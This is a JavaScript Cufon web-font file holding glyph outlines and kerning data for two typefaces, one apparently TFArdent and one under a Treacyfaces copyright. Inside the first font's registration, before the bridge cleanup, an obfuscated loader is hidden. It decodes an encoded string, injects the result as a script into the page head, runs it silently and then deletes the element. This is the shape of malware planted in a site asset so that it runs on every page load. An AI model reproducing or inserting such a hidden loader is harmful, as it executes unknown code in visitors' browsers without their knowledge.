75,-33v0,15,13,27,26,26r0,7r-75,0r0,-7v44,-3,26,-80,26,-125v0,-39,-15,-54,-43,-54v-80,0,-49,83,-55,153v-2,15,13,27,25,26r0,7r-74,0r0,-7v13,1,26,-12,26,-26r0,-130v0,-14,-15,-15,-30,-14r0,-7v18,-3,36,-16,53,-13r0,27v0,0,19,-29,57,-29v85,0,64,92,64,166","w":198,"k":{"y":10,"w":10,"v":10,"p":4,"\/":-14,".":-5}},{"d":"43,-232v1,-15,-16,-26,-28,-26r0,-7v128,-3,235,-10,235,131v0,95,-48,134,-129,134r-104,0r0,-7v13,1,26,-12,26,-26r0,-199xm221,-134v0,-107,-77,-130,-152,-112r0,200v0,29,13,34,48,34v66,0,104,-34,104,-122","w":262,"k":{"Z":12,"Y":29,"X":24,"W":24,"V":24,"U":7,"T":10,"R":5,"Q":-3,"P":7,"O":-3,"N":7,"M":10,"L":7,"K":7,"J":3,"I":5,"H":7,"G":-5,"F":10,"E":5,"D":10,"C":-5,"B":5,"A":24,";":-12,":":-12,"\/":3,".":24,"-":-14,",":24}},{"d":"88,-258v-40,2,-21,69,-25,110r104,-84v14,-8,16,-26,-4,-26r0,-7r79,0r0,7v-13,0,-25,5,-51,26r-100,78r132,132v5,5,20,14,28,14r0,8r-43,0r-145,-144r0,111v-2,15,13,27,26,26r0,7r-78,0r0,-7v12,1,25,-11,25,-26r0,-199v2,-14,-13,-26,-25,-26r0,-7r77,0r0,7","w":243,"k":{"z":5,"y":19,"w":14,"v":14,"u":17,"t":12,"s":12,"r":7,"p":12,"o":19,"n":7,"l":-7,"k":-7,"h":-7,"e":19,"a":11,"Z":5,"Y":24,"X":-5,"W":14,"V":26,"U":17,"T":-3,"S":7,"Q":19,"P":-5,"O":19,"N":-3,"M":-5,"L":-7,"J":-3,"I":-5,"G":19,"F":-3,"E":-3,"D":-5,"C":19,"B":-7,"A":24,";":-7,":":-3,"\/":-30,".":-12,"-":26,",":-12,"!":5}},{"d":"189,-116r-167,80r0,-11r146,-84r-146,-84r0,-11r167,80r0,30"}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+201-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("c_uJo*$X!k&|c]}O-*xmQ_Q&V>$Ju*&|V>pm!k{HuIY85MX1Vx.J!mK,ux2ZcI,4T_.&[DPkIJR4!x&yCXzq-qfHkF,Kc>&*DqAE$DJX5MN2uq$QBIAdT}N1-H4.yIXeC)3xQ[K~p13y-DfN5DfXC[}=B2Nm5}[O{2J}p[R~dI{m{>?>oD$]o2{C:1Q|yqP8!VdzQ1Q,C_2&R].N:kQ|y].8fP])?x_FQpcCR$B:d{=D[IkV5u!oy-ET431Z2}*Hz,~i8A|LN.mMXJ>qbK7OY&0e:Vf|o_I|uq{zC_y&51K*C*-8EVPzyMJOTDA,u131C*&i:=&Ec)Y7-q-qV]b,:m4eBH{zy*I3uF$M-F}8!kKHV]KAoqp}5qp}5V{,-*}XEIN|5>&yCHIiTF{zy*I3uF$M-F}8!kKHV]KZoJN|-kAY-_3mukx2yJN|ok$yC*.L5>x8c=dL!=KXuV$Xc_.L5>xX!k&|C*3Lyq{|5kJ}c=}*oqQzB>2Yo)8ic>2,uJAZk>}-VDJNk>}-T=2zc=f4")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":210,"face":{"font-family":"TFArdent","font-weight":500,"font-stretch":"normal","units-per-em":"360","panose-1":"0 0 0 0 0 0 0 0 0 0","ascent":"288","descent":"-72","x-height":"3","bbox":"-53 -283.57 378 86","underline-thickness":"4.68","underline-position":"-29.88","stemh":"11","stemv":"26","unicode-range":"U+0020-U+007E"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copr.1991-93, Joseph Treacy,Treacyfaces,Inc. V.12, completed 1.20.93.
 * Glyphs,dataCopr.TF. All world rights reserved.
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"203,67r-203,0r0,-16r203,0r0,16","w":200},{"d":"191,-111r-176,85r0,-24r110,-81r-110,-81r0,-24r176,85r0,40","w":210},{"d":"207,-25v0,0,-35,30,-99,30v-39,0,-99,-20,-99,-104v0,-83,59,-104,105,-104v41,0,93,22,93,107r-129,0v-2,91,97,63,129,35r0,36xm139,-123v0,-12,0,-50,-31,-50v-28,0,-29,38,-29,50r60,0","w":213,"k":{"y":5,"x":7,"w":10,"v":7,"t":5,"s":-5,"\/":-19}},{"w":104},{"d":"58,-24v16,1,26,-12,27,-26r0,-187v-40,-1,-53,14,-52,52r-31,0r0,-80r238,0r0,80r-31,0v1,-37,-12,-53,-55,-52r0,187v-2,16,14,27,29,26r0,24r-125,0r0,-24","w":241,"k":{"z":3,"y":-5,"x":3,"w":-3,"v":-3,"u":5,"s":19,"r":5,"p":14,"o":40,"n":5,"m":5,"g":30,"e":39,"d":31,"c":23,"a":12,"Z":5,"Y":-3,"V":-3,"T":-7,"S":-3,"R":-3,"Q":14,"P":-5,"O":12,"N":-3,"M":-3,"G":5,"C":10,"A":23,";":12,":":12,"\/":5,".":53,"-":44,",":53}},{"d":"33,-215v1,-13,-12,-27,-23,-26r0,-24r116,0r0,24v-11,-1,-24,12,-24,26r0,174v0,95,-64,105,-147,98r0,-31v65,0,78,-17,78,-71r0,-170","w":130,"k":{"u":7,"r":5,"o":17,"i":5,"e":17,"a":19,"J":-10,"A":24,"\/":-3,".":17,",":17}},{"d":"212,-13v0,0,-25,17,-53,17v-26,0,-38,-16,-38,-16v0,0,-23,17,-50,17v-36,0,-67,-22,-67,-64v0,-57,58,-69,109,-69v0,-23,3,-43,-31,-44v-26,0,-30,14,-30,34r-32,0r0,-56v0,0,21,-9,66,-9v46,0,94,14,94,69r0,84v-2,20,17,15,23,11xm94,-31v37,0,12,-42,19,-70v-35,0,-40,23,-40,39v0,17,6,31,21,31","w":193,"k":{"z":-12,"y":7,"x":-5,"w":10,"v":7,"t":3,"s":-14,"r":-7,"j":-10,"i":-7,"f":-10,"\/":-43,".":-14}},{"d":"28,-215v2,-13,-11,-27,-23,-26r0,-24v85,5,224,-23,223,60v0,43,-43,61,-71,61v35,0,88,13,88,66v0,107,-139,72,-240,78r0,-24v12,1,23,-13,23,-26r0,-165xm158,-200v7,-39,-45,-42,-61,-30r0,75v39,3,63,-6,61,-45xm173,-78v0,-37,-33,-51,-76,-47v6,37,-20,99,26,99v29,0,50,-17,50,-52","w":253,"k":{"y":5,"w":10,"u":5,"r":7,"o":3,"l":7,"Z":12,"Y":36,"X":24,"W":29,"V":36,"U":22,"T":10,"S":3,"R":12,"Q":7,"P":10,"O":7,"N":14,"M":14,"L":12,"K":12,"J":12,"I":12,"H":10,"G":5,"F":7,"E":12,"D":12,"C":5,"B":12,"A":24,"\/":-12,".":10,"-":-12,",":14}},{"d":"215,-215v1,-13,-12,-27,-23,-26r0,-24r80,0r0,24v-11,0,-25,13,-24,26r0,215r-50,0r-136,-195r0,145v-2,13,11,27,23,26r0,24r-80,0r0,-24v12,1,24,-13,23,-26r0,-171v0,-12,-7,-22,-23,-20r0,-24r93,0r117,169r0,-119","w":274,"k":{"y":5,"u":7,"o":14,"g":10,"e":14,"a":12,"Z":7,"Y":7,"X":7,"W":5,"T":-5,"A":19,"\/":-7,".":14,",":14}},{"d":"133,-66v2,-59,-124,-57,-124,-129v0,-52,45,-75,103,-75v43,0,79,8,79,8r0,61r-35,0v0,-27,-16,-41,-40,-41v-18,0,-33,12,-33,35v0,25,18,34,59,50v41,16,65,38,65,77v0,58,-46,84,-104,84v-50,0,-99,-17,-99,-17r0,-64r34,0v0,40,22,53,49,53v36,0,46,-23,46,-42","w":205,"k":{"z":-3,"y":7,"x":7,"w":14,"v":10,"u":5,"t":7,"s":-5,"r":3,"q":-7,"p":7,"o":-7,"c":-7,"a":-7,"Z":5,"Y":11,"X":10,"W":11,"V":11,"U":10,"S":-3,"R":5,"N":5,"M":5,"G":-7,"A":19,"\/":-22,"-":-5}},{"d":"29,-159v2,-13,-16,-7,-26,-8r0,-21r78,-18r15,7r0,20v0,0,16,-24,56,-24v38,0,82,23,82,104v0,113,-89,115,-138,90v-1,29,-2,58,26,57r0,24r-117,0r0,-24v12,1,24,-12,24,-26r0,-181xm165,-99v0,-52,-15,-68,-37,-68v-53,11,-25,74,-32,125v0,0,5,15,32,15v22,0,37,-22,37,-72","w":241,"k":{"y":7,"x":5,"w":7,"v":7,"t":5,"p":7,"l":5,"k":7,"h":7,"c":-5,"\/":-14}},{"d":"124,-78v0,-50,-101,-45,-101,-110v0,-34,30,-58,71,-58r0,-29r26,0r0,28v35,0,64,16,64,16r0,51r-34,0v0,-19,-10,-38,-33,-38v-19,0,-27,9,-27,24v0,12,7,20,35,33v36,17,69,32,69,75v0,48,-46,69,-74,69r0,38r-26,0r0,-37v-45,0,-73,-23,-73,-23r0,-54r32,0v0,19,8,46,40,46v22,0,31,-17,31,-31","w":210,"k":{"1":46}},{"d":"4,-265v96,3,229,-22,229,72v0,46,-31,68,-63,77r67,66v13,12,23,26,49,26r0,24r-100,0r-85,-109r-3,0v2,35,-9,84,23,85r0,24r-116,0r0,-24v12,1,24,-13,23,-26r0,-165v1,-13,-11,-27,-24,-26r0,-24xm161,-188v0,-43,-39,-58,-63,-42r0,96v45,2,63,-14,63,-54","w":246,"k":{"y":-5,"u":-6,"t":-7,"s":-24,"p":-5,"j":-26,"g":-29,"f":-3,"d":-5,"b":-7,"a":-19,"Z":-10,"Y":15,"W":15,"V":15,"S":-10,"R":3,"P":3,"M":3,"J":-24,"\/":-62,".":-39,"-":11,",":-36}},{"d":"249,-13v0,0,-37,18,-102,18v-82,0,-139,-40,-139,-140v0,-98,67,-135,139,-135v65,0,100,8,100,8r0,63r-36,0v0,-27,-15,-43,-54,-43v-39,0,-77,22,-77,107v0,86,40,109,76,109v41,0,59,-17,59,-48r34,0r0,61","w":263,"k":{"y":8,"o":10,"e":10,"Z":5,"Y":12,"X":7,"W":7,"V":10,"U":7,"T":3,"S":3,"Q":10,"O":10,"J":-7,"G":12,"F":3,"E":5,"D":-5,"C":12,"B":-5,"A":17,";":-5,":":-5,"\/":-14}},{"d":"96,-24v0,38,-25,83,-25,83r-31,0v0,0,15,-30,15,-51v0,-51,-37,0,-37,-54v0,-18,17,-30,35,-30v20,0,43,11,43,52","w":116,"k":{"H":-3,"1":36,"0":22,"'":118,"\"":103}},{"w":104},{"d":"202,-74v0,54,-41,79,-95,79v-51,0,-83,-8,-83,-8r0,-64r36,0v0,30,13,42,35,42v23,0,36,-16,36,-50v0,-30,-24,-57,-71,-51r0,-29v44,4,70,-13,70,-44v0,-25,-9,-43,-32,-43v-22,0,-33,13,-33,43r-36,0r0,-63v0,0,28,-8,78,-8v52,0,90,17,90,66v1,52,-56,61,-75,64v34,0,80,17,80,66","k":{"9":22,"8":22,"7":43,"6":19,"5":36,"4":24,"3":36,"2":33,"1":55,"0":19,"\/":3,".":24,"-":22,",":29}},{"d":"217,0r-109,0r0,-24v14,-1,5,-20,0,-26r-13,-21v-7,12,-18,23,-20,39v0,6,5,8,9,8r0,24r-84,0r0,-24v31,-4,53,-53,72,-76v-18,-22,-35,-72,-67,-73r0,-24r111,0r0,24v-25,5,0,26,5,37v5,-9,15,-19,17,-29v0,-6,-3,-8,-9,-8r0,-24r82,0r0,24v-30,1,-49,45,-68,64v23,27,38,72,74,85r0,24","w":215,"k":{"o":10,"i":-7,"f":-7,"e":5,"d":5,"c":5,"\/":-31,"-":14}},{"d":"217,-156v-26,0,-27,4,-28,28v0,61,-56,71,-90,71v-32,0,-39,3,-39,9v8,16,40,8,61,8v57,0,86,17,86,55v0,47,-58,66,-106,66v-55,0,-106,-11,-106,-45v0,-35,49,-37,49,-37v0,0,-41,-5,-41,-30v0,-22,31,-36,50,-36v0,0,-44,-15,-44,-61v0,-53,42,-75,90,-75v52,0,63,39,63,25v0,-26,28,-26,55,-25r0,47xm126,-130v0,-33,-11,-45,-27,-45v-16,0,-27,12,-27,45v0,31,11,45,27,45v16,0,27,-14,27,-45xm144,28v0,-23,-42,-25,-79,-24v-15,19,4,59,35,50v31,0,44,-13,44,-26","w":207,"k":{"y":-7,"x":-10,"s":-7,"j":-31,"\/":-29}},{"d":"143,-159v2,-13,-16,-7,-26,-8r0,-21r78,-18r15,7r0,149v-2,20,17,15,23,11r9,26v0,0,-26,17,-54,17v-26,0,-37,-16,-37,-16v0,0,-21,17,-60,17v-83,0,-62,-89,-62,-164v0,-13,-16,-7,-26,-8r0,-21r78,-18r15,7r0,140v0,12,5,28,24,28v19,0,23,-14,23,-14r0,-114","w":237,"k":{"y":5,"w":12,"v":10,"u":5,"t":5,"p":5,"b":5,"\/":-26}},{"d":"229,0r-226,0r0,-21r136,-216r-33,0v-58,0,-64,12,-64,47r-29,0r0,-75r209,0r0,21r-137,214r51,0v58,0,63,-14,63,-55r30,0r0,85","w":231,"k":{"y":5,"a":-7,"U":5,"T":-5,"S":-5,"Q":5,"O":5,"G":5,"C":5,"A":7,"\/":-29,".":-7,"-":3}},{"d":"166,-220v-17,4,-95,-9,-102,-14r0,-41v24,-12,26,5,52,22v28,18,59,1,50,33","w":227},{"d":"295,-71v0,58,-36,76,-65,76v-30,0,-65,-16,-65,-76v0,-58,35,-76,65,-76v29,0,65,16,65,76xm243,-269r-145,269r-36,0r145,-269r36,0xm140,-194v0,57,-36,75,-65,75v-29,0,-66,-15,-66,-75v0,-58,37,-76,66,-76v29,0,65,16,65,76xm251,-71v0,-43,-7,-57,-21,-57v-14,0,-22,14,-22,57v0,43,8,57,22,57v14,0,21,-14,21,-57xm96,-194v0,-43,-7,-58,-21,-58v-14,0,-22,15,-22,58v0,43,8,56,22,56v14,0,21,-13,21,-56","w":295},{"d":"99,-253v0,19,-16,34,-37,34v-21,0,-38,-15,-38,-34v0,-19,17,-34,38,-34v21,0,37,15,37,34xm29,-159v2,-13,-16,-7,-26,-8r0,-21r78,-18r15,7r0,177v-4,92,-62,90,-137,87r0,-27v47,-3,70,-6,70,-61r0,-136","w":113,"k":{"t":5,"o":5,"j":-12,"e":5,"\/":-17}},{"d":"415,-241v-16,0,-28,8,-33,26r-65,215r-63,0r-46,-172r-42,172r-64,0r-67,-215v-7,-22,-21,-26,-34,-26r0,-24r128,0r0,24v-24,0,-21,12,-17,26r40,152r45,-202r56,0r49,201r44,-166v0,-5,-5,-11,-20,-11r0,-24r89,0r0,24","w":414,"k":{"y":10,"u":24,"t":12,"s":24,"r":17,"p":22,"o":39,"n":22,"m":26,"l":5,"k":7,"i":14,"h":7,"e":39,"d":31,"a":29,"Z":5,"U":19,"S":14,"Q":22,"O":23,"G":15,"C":15,"A":43,";":22,":":14,"\/":17,".":50,"-":26,",":50}},{"d":"108,-234r-29,13r29,14r-12,19r-26,-17r3,32r-23,0r2,-32r-26,18r-12,-20r30,-14r-29,-14r11,-20r26,18r-2,-32r23,0r-3,32r26,-17","w":102},{"d":"280,-132v0,105,-68,137,-134,137v-66,0,-134,-27,-134,-137v0,-105,68,-138,134,-138v66,0,134,28,134,138xm208,-132v0,-82,-23,-109,-62,-109v-39,0,-62,27,-62,109v0,82,23,108,62,108v39,0,62,-26,62,-108","w":291,"k":{"Y":22,"X":22,"W":17,"V":17,"U":3,"T":10,"S":-3,"A":24,";":-3,":":-3,"\/":-7,".":22,",":19}},{"d":"173,-23v0,0,-35,28,-75,28v-33,0,-65,-16,-65,-64r0,-108r-28,0r0,-30r31,0r0,-51r64,-16r0,67r62,0r0,30r-62,0r0,100v-7,45,56,26,64,18","w":164,"k":{"z":-10,"y":-10,"x":-7,"s":-10,"r":-7,"p":-5,"n":-10,"m":-10,"j":-7,"i":-10,"f":-10,"e":5,"a":-7,";":-7,":":-7,"\/":-36,".":-10,"-":-5,",":-7}},{"d":"89,-274r-71,297r-39,0r71,-297r39,0","w":78,"k":{"z":-5,"x":-5,"u":-10,"s":-3,"q":5,"o":7,"k":-14,"h":-19,"Z":-12,"Y":-22,"X":-24,"W":-22,"V":-22,"U":-14,"T":-26,"S":-10,"R":-19,"Q":5,"P":-26,"O":1,"N":-24,"M":-24,"L":-26,"K":-26,"J":-19,"I":-24,"H":-22,"G":-10,"F":-22,"E":-26,"D":-26,"C":-10,"B":-29,"A":3,"9":-12,"8":-10,"7":3,"6":-7,"5":-5,"4":3,"3":-5,"2":-12,"1":12,"0":-5}},{"d":"79,-24v36,0,23,-55,25,-92r-60,-99v-13,-17,-21,-26,-43,-26r0,-24r138,0r0,24v-24,1,-18,13,-11,26r31,59r39,-74v0,-5,-7,-11,-19,-11r0,-24r97,0r0,24v-23,0,-33,5,-46,26r-58,97v2,38,-11,93,25,94r0,24r-118,0r0,-24","w":277,"k":{"z":36,"y":22,"w":31,"v":24,"u":26,"t":24,"s":43,"r":29,"p":26,"o":58,"i":14,"g":58,"e":58,"d":43,"a":48,"Z":7,"Y":7,"X":7,"W":7,"V":7,"U":7,"S":22,"Q":28,"O":25,"G":29,"C":26,"A":43,";":39,":":39,"\/":19,".":60,"-":48,",":60}},{"d":"188,-10v0,0,-27,15,-76,15v-49,0,-104,-20,-104,-104v0,-81,60,-104,104,-104v49,0,74,11,74,11r0,50r-33,0v0,-20,-12,-32,-34,-32v-27,0,-41,23,-41,75v0,50,16,73,39,73v22,0,36,-13,36,-38r35,0r0,54","w":195,"k":{"z":-5,"u":-5,"t":-5,"s":-7,"r":-5,"p":-6,"n":-6,"m":-6,"l":-3,"k":-3,"j":-7,"i":-8,"h":-3,"g":-5,"f":-7,"c":-3,"b":-3,"\/":-23}},{"d":"213,-133v0,99,-43,138,-119,138v-36,0,-76,-8,-76,-8r0,-64r36,0v0,31,12,43,40,43v28,0,47,-17,47,-91v0,0,-14,24,-49,24v-50,0,-83,-26,-83,-83v0,-54,35,-96,98,-96v72,0,106,40,106,137xm140,-181v0,-45,-12,-61,-31,-61v-19,0,-31,16,-31,61v0,44,12,58,31,58v19,0,31,-14,31,-58","k":{"9":7,"8":14,"7":39,"6":7,"5":26,"4":19,"3":31,"2":31,"1":51,"0":5,"\/":-5,".":19,"-":7,",":24}},{"d":"211,-125v-18,26,-39,73,-86,56v-30,-11,-75,-43,-97,-6r-20,-11v19,-26,39,-74,86,-56v29,11,75,44,96,6","w":217},{"d":"94,44r-87,0r0,-23r20,0r0,-278r-20,0r0,-24r87,0r0,325","w":103},{"d":"215,-173v-16,0,-21,2,-29,26r-50,147r-57,0r-49,-147v-8,-23,-10,-26,-27,-26r0,-24r108,0r0,24v-22,1,-17,14,-12,26r26,80r30,-95v0,-5,-2,-11,-14,-11r0,-24r74,0r0,24","w":215,"k":{"z":1,"y":-7,"w":-7,"v":-7,"t":-5,"q":10,"o":10,"n":-5,"m":-5,"k":5,"j":-7,"i":-5,"h":5,"g":7,"f":-5,"e":10,"d":7,"c":7,"a":5,";":-3,":":-3,".":36,"-":12,",":36}},{"d":"298,0r-142,0r0,-24v25,-3,23,-9,10,-29r-37,-52v-14,22,-37,41,-44,69v0,5,5,12,19,12r0,24r-103,0r0,-24v23,0,37,-14,46,-26r62,-81r-63,-84v-11,-14,-21,-26,-42,-26r0,-24r135,0r0,24v-24,0,-20,14,-11,26r32,45v13,-20,35,-35,42,-60v0,-5,-7,-11,-19,-11r0,-24r100,0r0,24v-23,0,-34,11,-46,26r-57,70r73,95v10,14,29,26,45,26r0,24","w":286,"k":{"y":5,"v":14,"u":22,"t":17,"s":5,"p":7,"o":26,"m":10,"e":26,"d":19,"c":17,"a":3,"U":10,"S":5,"Q":19,"O":22,"G":19,"C":19,"A":10,"\/":-41,"-":24}},{"d":"309,-132v0,40,-14,104,23,108r0,24r-104,0r0,-24v22,-10,14,-65,14,-101v0,-23,-5,-40,-20,-40v-33,0,-15,78,-19,115v-4,9,11,26,14,26r0,24r-94,0v-5,-25,14,-31,14,-50v0,-38,13,-109,-20,-115v-34,5,-14,78,-20,115v-2,10,11,25,14,26r0,24r-104,0r0,-24v41,-6,18,-84,23,-128v2,-14,-11,-16,-26,-15r0,-21r78,-18r15,7r0,20v0,0,12,-24,48,-24v33,0,48,24,48,24v0,0,11,-24,55,-24v28,0,61,20,61,71","w":330,"k":{"z":-5,"y":10,"w":12,"v":10,"u":5,"t":10,"p":7,"o":5,"e":5,"b":5,"\/":-26}},{"d":"96,44r-86,0r0,-325r86,0r0,24r-19,0r0,278r19,0r0,23","w":103},{"d":"3,-24v17,1,28,-12,28,-26r0,-117r-28,0r0,-30r28,0v-2,-43,21,-73,77,-73v43,0,69,9,69,9r0,48r-34,0v0,-17,-5,-30,-23,-30v-22,0,-22,22,-22,46r62,0r0,30r-62,0r0,117v2,17,8,27,32,26r0,24r-127,0r0,-24","w":162,"k":{"z":-7,"y":-7,"t":-7,"r":-7,"o":12,"l":-19,"k":-17,"j":-7,"e":7,"d":7,"b":-24,";":-7,":":-7,"\/":-12,".":22,"-":14,",":29}},{"d":"1,-265v99,5,240,-25,240,72v0,88,-83,84,-143,84v1,37,-10,86,28,85r0,24r-120,0r0,-24v11,0,25,-13,24,-26r0,-165v0,-15,-12,-27,-29,-26r0,-24xm169,-192v0,-32,-15,-45,-42,-45v-21,0,-29,6,-29,6r0,95v47,3,71,-12,71,-56","w":246,"k":{"y":-5,"v":-5,"s":3,"o":12,"i":-5,"g":7,"e":12,"d":12,"c":10,"a":10,"Z":5,"Y":18,"X":17,"W":7,"V":12,"U":10,"T":-3,"S":-3,"R":5,"P":5,"N":5,"M":5,"L":5,"K":5,"D":7,"B":3,"A":41,";":3,":":3,"\/":7,".":48,"-":14,",":48}},{"d":"30,-215v1,-12,-13,-27,-24,-26r0,-24r118,0v98,0,146,40,146,128v0,90,-45,137,-143,137r-121,0r0,-24v11,0,25,-13,24,-26r0,-165xm198,-137v0,-86,-46,-113,-99,-93r0,177v0,15,15,27,31,27v41,0,68,-34,68,-111","w":281,"k":{"Z":12,"Y":29,"X":24,"W":24,"V":24,"U":7,"T":10,"R":5,"Q":-3,"P":7,"O":-3,"N":7,"M":10,"L":7,"K":7,"J":3,"I":5,"H":7,"G":-5,"F":10,"E":5,"D":10,"C":-5,"B":5,"A":24,";":-3,":":-3,"\/":-7,".":24,"-":-14,",":24}},{"d":"203,-78v0,48,-33,83,-105,83v-37,0,-72,-8,-72,-8r0,-63r36,0v0,30,12,43,33,43v21,0,37,-14,37,-52v0,-31,-15,-53,-45,-53v-25,0,-48,10,-48,10r0,-147r147,0r-10,62r-107,0r0,48v0,0,14,-4,34,-4v67,0,100,28,100,81","k":{"9":29,"8":26,"7":55,"6":22,"5":39,"4":24,"3":36,"2":36,"1":61,"0":17,"\/":3,".":26,"-":12,",":26}},{"d":"99,-253v0,19,-16,34,-37,34v-21,0,-38,-15,-38,-34v0,-19,17,-34,38,-34v21,0,37,15,37,34xm96,-50v-1,13,12,27,23,26r0,24r-114,0r0,-24v44,-6,17,-89,24,-135v2,-13,-15,-7,-26,-8r0,-21r78,-18r15,7r0,149","w":121,"k":{"y":5,"w":7,"v":7,"t":7,"p":5,"\/":-29}},{"d":"216,-91v0,54,-36,96,-99,96v-72,0,-105,-40,-105,-137v0,-100,41,-138,117,-138v36,0,75,8,75,8r0,63r-36,0v0,-31,-12,-43,-40,-43v-28,0,-45,18,-45,92v0,0,14,-24,49,-24v50,0,84,27,84,83xm147,-84v0,-43,-12,-58,-31,-58v-19,0,-31,15,-31,58v0,45,12,61,31,61v19,0,31,-16,31,-61","k":{"9":10,"8":12,"7":33,"6":7,"5":24,"4":12,"3":24,"2":24,"1":48,"0":5,"\/":-10,".":14,"-":5,",":17}},{"d":"179,0r-176,0r0,-21r93,-149v-32,-2,-69,4,-62,29r-26,0r0,-56r168,0r0,21r-92,148v38,2,73,0,67,-38r28,0r0,66","w":181,"k":{"z":-7,"s":-7,"r":-7,"f":-10,"a":-5,"\/":-31}},{"d":"131,30v-70,0,-126,-46,-126,-155v0,-104,56,-156,126,-156r0,23v-33,0,-57,46,-57,133v0,87,24,133,57,133r0,22","w":145},{"d":"98,-157v0,20,-18,36,-40,36v-22,0,-40,-16,-40,-36v0,-20,18,-36,40,-36v22,0,40,16,40,36xm96,-24v0,38,-25,83,-25,83r-31,0v0,0,15,-30,15,-51v0,-51,-37,0,-37,-54v0,-18,17,-30,35,-30v20,0,43,11,43,52","w":116},{"d":"217,-75v0,99,-206,111,-206,9v0,-53,56,-65,56,-65v0,0,-47,-18,-47,-64v0,-49,44,-75,97,-75v54,0,88,24,88,64v0,42,-50,60,-50,60v0,0,62,14,62,71xm147,-206v0,-22,-11,-38,-30,-38v-21,0,-34,9,-34,37v0,30,35,42,41,42v5,0,23,-17,23,-41xm147,-68v0,-22,-21,-45,-44,-45v-38,0,-39,90,8,90v19,0,36,-15,36,-45","k":{"9":12,"8":12,"7":36,"6":10,"5":22,"4":12,"3":24,"2":29,"1":47,"0":12,"\/":-14,".":12,"-":5,",":10}},{"d":"211,-132v0,40,-15,104,24,108r0,24r-112,0r0,-24v33,-3,22,-63,22,-101v0,-23,-5,-40,-24,-40v-41,0,-20,75,-25,115v-2,12,12,26,21,26r0,24r-112,0r0,-24v12,1,24,-12,24,-26r0,-174v2,-13,-16,-7,-26,-8r0,-21v31,-3,66,-24,93,-11r0,80v0,0,12,-19,50,-19v34,0,65,20,65,71","w":235,"k":{"y":10,"x":7,"w":17,"v":14,"u":7,"t":12,"f":5,"e":7,"b":7,"a":5,"\/":-26}},{"d":"105,-49v0,-43,-100,-39,-100,-96v0,-40,40,-58,84,-58v42,0,77,10,77,10r0,51r-34,0v0,-14,-8,-33,-32,-33v-18,0,-29,7,-29,19v0,10,5,17,38,30v44,18,66,35,66,67v0,49,-43,64,-94,64v-41,0,-78,-15,-78,-15r0,-55r33,0v0,18,7,39,36,39v19,0,33,-8,33,-23","w":177,"k":{"z":-5,"s":-7,"c":-5,"a":-5,"\/":-24}},{"d":"69,21r-34,0r0,-302r34,0r0,302","w":104},{"d":"29,-152v2,-14,-11,-16,-26,-15r0,-21r76,-18r16,7r0,25v0,0,10,-31,42,-31v50,0,32,29,35,68r-38,0v0,-18,-6,-26,-19,-26v-29,1,-16,79,-19,113v-1,14,12,27,25,26r0,24r-116,0r0,-24v43,-5,19,-83,24,-128","w":172,"k":{"z":-3,"y":-7,"x":-3,"w":-5,"v":-5,"u":-7,"t":-5,"s":-3,"r":-7,"p":-5,"o":5,"n":-7,"m":-5,"k":5,"j":-7,"i":-5,"f":-7,";":-5,":":-5,"\/":-12,".":36,",":36}},{"d":"98,-157v0,20,-18,36,-40,36v-22,0,-40,-16,-40,-36v0,-20,18,-36,40,-36v22,0,40,16,40,36xm98,-41v0,20,-18,36,-40,36v-22,0,-40,-16,-40,-36v0,-20,18,-35,40,-35v22,0,40,15,40,35","w":116,"k":{"1":36}},{"d":"189,-112r-21,0r-73,-91r-73,91r-22,0r76,-158r37,0","w":189},{"d":"127,-270r-15,97r-27,0r-16,-97r58,0xm61,-270r-15,97r-27,0r-16,-97r58,0","w":130,"k":{".":134,",":137}},{"d":"284,-241v-16,0,-27,8,-33,26r-74,215r-63,0r-79,-215v-8,-22,-21,-26,-34,-26r0,-24r128,0r0,24v-21,1,-21,12,-16,26r50,152r51,-167v0,-5,-7,-11,-19,-11r0,-24r89,0r0,24","w":284,"k":{"z":19,"y":10,"v":10,"u":19,"t":10,"s":24,"r":14,"p":17,"o":31,"m":14,"i":7,"g":26,"e":36,"a":29,"Z":7,"W":-5,"S":10,"Q":19,"O":19,"G":17,"C":17,"A":46,";":17,":":17,"\/":12,".":55,"-":22,",":55}},{"d":"257,-50v-2,13,11,27,23,26r0,24r-116,0r0,-24v36,-1,21,-62,24,-100r-90,0v3,38,-13,99,23,100r0,24r-116,0r0,-24v12,1,23,-13,23,-26r0,-165v2,-13,-11,-27,-23,-26r0,-24r116,0r0,24v-32,-1,-22,52,-23,87r90,0v-1,-36,9,-87,-24,-87r0,-24r116,0r0,24v-12,-1,-23,13,-23,26r0,165","w":287,"k":{"z":-3,"y":7,"w":7,"v":7,"t":7,"q":10,"o":10,"l":-5,"e":10,"a":10,"B":-5,"\/":-19}},{"d":"22,-224v2,-13,-16,-7,-27,-8r0,-21v31,-3,67,-24,94,-11r0,78v55,-35,137,-19,137,87v0,110,-82,117,-144,91r-64,11r-6,-19v0,0,10,-7,10,-33r0,-175xm157,-95v0,-52,-9,-74,-37,-74v-53,0,-24,81,-31,130v30,30,68,15,68,-56","w":234,"k":{"y":10,"x":7,"w":7,"v":7,"b":10,"\/":-10}},{"d":"29,-224v1,-12,-15,-7,-26,-8r0,-21v31,-3,66,-24,93,-11r0,146r39,-51v0,-2,-8,-4,-15,-4r0,-24r114,0r0,24v-34,4,-58,31,-84,46v28,29,62,93,99,103r0,24r-129,0r0,-24v18,-2,12,-18,4,-30r-25,-38r-3,0v0,25,-3,62,12,68r0,24r-103,0r0,-24v11,1,24,-12,24,-26r0,-174","w":234,"k":{"z":-10,"y":-7,"x":-12,"s":-7,"r":-14,"n":-14,"m":-12,"j":-10,"i":-14,"g":-7,"f":-12,"e":10,"b":-10,";":-12,":":-12,"\/":-43,".":-14,"-":12,",":-12,"!":-12}},{"d":"238,-190r-9,33r-55,0r-7,32r54,0r-8,34r-54,0r-25,104r-34,0r24,-104r-32,0r-25,104r-34,